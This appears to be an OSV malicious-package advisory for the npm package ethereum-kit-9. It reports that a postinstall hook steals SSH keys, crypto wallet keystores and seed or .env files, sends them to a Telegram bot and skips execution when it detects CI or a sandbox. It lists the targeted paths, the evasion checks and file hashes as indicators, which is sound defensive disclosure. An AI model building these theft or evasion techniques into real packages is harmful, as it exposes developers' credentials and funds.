MAL-2026-5356

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethereum-kit-9/MAL-2026-5356.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5356
Published
2026-06-09T07:55:35Z
Modified
2026-06-11T02:31:32.056543802Z
Summary
Malicious code in ethereum-kit-9 (npm)
Details

Crypto/SSH/wallet stealer, blockchain-helper-0 campaign sibling (c960+). postinstall auto-execs, src/index.js harvests ~/.ssh/idrsa+ided25519+Sol/Eth/BTC/Tron/Sui/Aptos wallets+.env+seeds, self-labels "CRYPTO STEALER", exfils to SAME Telegram bot 8227918239 chat 6433587894 (not rotated). Campaign now uses inflated version (1.25.36) not 1.0.0.

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fca6873d6bb09703d4ceba095e845845ec40ca4274def05870ed6d59b90fdf6a)

On npm install, the package's postinstall hook loads src/index.js, which after a short delay and a sandbox/CI evasion check enumerates the installer's home and project directories for sensitive files and uploads each one to api.telegram.org using a hardcoded bot token and chatid. Targeted paths include SSH private keys (~/.ssh/idrsa, ided25519), crypto wallet keystores and data directories for Solana, Ethereum (~/.ethereum/keystore), Bitcoin, Tron, Sui, and Aptos, and project secrets (.env,.env.local, mnemonic.txt, seed.txt, wallet.json, private.key, secrets.json). The payload skips execution when CI/sandbox indicators are present (CI=true, GITHUBACTIONS, NODE_ENV=test/development, usernames like runner/sandbox/docker/jenkins, and 12-hex-char container hostnames) to evade analysis. The package name and generic 'Utility library' description with placeholder author impersonate Ethereum tooling to lure developers.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005351",
            "import_time": "2026-06-11T02:24:27.113320556Z",
            "sha256": "fca6873d6bb09703d4ceba095e845845ec40ca4274def05870ed6d59b90fdf6a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:39:32Z",
            "versions": [
                "1.25.36"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / ethereum-kit-9

Package

Name
ethereum-kit-9
View open source insights on deps.dev
Purl
pkg:npm/ethereum-kit-9

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.25.36

Database specific

cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "evidence_files": [
        {
            "path": "src/index.js",
            "sha256": "c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f",
            "tlsh": "36b121f40ee677148193e3a9624f60015436e1473c06ed65769c83c8af89a2ca6f2efc"
        },
        {
            "path": "package.json",
            "sha256": "e3eba8520925dea0013f70f2928d2e3394d338710bc158b0b992d952d655bb55",
            "tlsh": "f1d0a7200f10977335c48a6e0866510a6ab10e0f5048bc1417f72158838abf648be61e"
        }
    ],
    "package_integrity": [
        {
            "filename": "ethereum-kit-9-1.25.36.tgz",
            "hashes": {
                "sha512_sri": "sha512-U6YW4vR9XhYaZAd2vEcz3c9FD2yriVYv1fFP8SW4iwyI+FZWHMgrmQmJhy6lTRsdrcrZfQ/tdkpUqSqXRNJdCQ==",
                "sha1": "fdf7ed482eaefd5219020cd370d1a43ea5c46da9"
            }
        }
    ]
}
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethereum-kit-9/MAL-2026-5356.json"